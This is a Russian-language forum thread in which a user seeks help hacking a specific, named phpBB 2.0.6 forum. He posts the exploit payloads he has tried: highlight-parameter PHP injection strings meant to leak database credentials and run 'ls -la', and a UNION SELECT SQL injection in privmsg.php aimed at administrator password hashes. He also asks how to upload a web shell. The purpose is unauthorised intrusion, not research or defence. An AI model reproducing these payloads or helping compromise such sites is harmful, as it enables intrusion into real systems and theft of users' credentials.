![]() |
Вопрос про Powered by phpBB 2.0.6
Есть такой вопрос:
Есть форум Powered by phpBB 2.0.6, если я пытаюсь его взломать через http://адрес сайта/forum/viewtopic.php?p=44&highlight=%2527.$poster=$dbname .%2527 то оно не то что не показывает ничего, а просто отображает ник пользователя, тоесть ни спецсимволов ни тем более пароля нет.Помогите, как ещё можна вскрыть этот форум? |
Все описаные уязвимости перепробывал, реакции вообще нет(
плх, хелп |
Мало инфы... Пиши то делал...
|
Пробывал так:
privmsg.php?folder=savebox&mode=read&p=99& amp;pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0 ,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_level=1 LIMIT 1/* При попытке закидывает на вход в систему Пробывал так: &highlight=%2527.$poster=$dbpasswd.%2527 ну естественно пробывал и пытался узнать $dbuser,$dbname,$dbname... при попытке открывается тема, но ник юзера так и остаётся, тоесть ни паса, ни логина, ни даже спецсимволов ничего нет.... p=123&highlight=%2527.$poster=%60ls%09-la%60.%2527 так тоже никакого рехультата, а значит и дамп базы я сделать тоже не могу... ещё что-то пробывал, перерыл весь секьюрити лаб, пересмотрел все связаные с пхп видео на античате.... ничего не выходит... |
ну и шелы тоже заливать ну никак не получается... просто входит в тему и всё...
|
Люди, как залить шел сюда- http://gta4.ovl.ru/forum/?
|
интересно, я дождусь ответа?
|
Esli u tebya nepoluchaetsa neodin exploit zdelat et znachet vse propatcheno, takshto zhdi noviee exploits
|
Цитата:
|
Цитата:
|
| Время: 10:42 |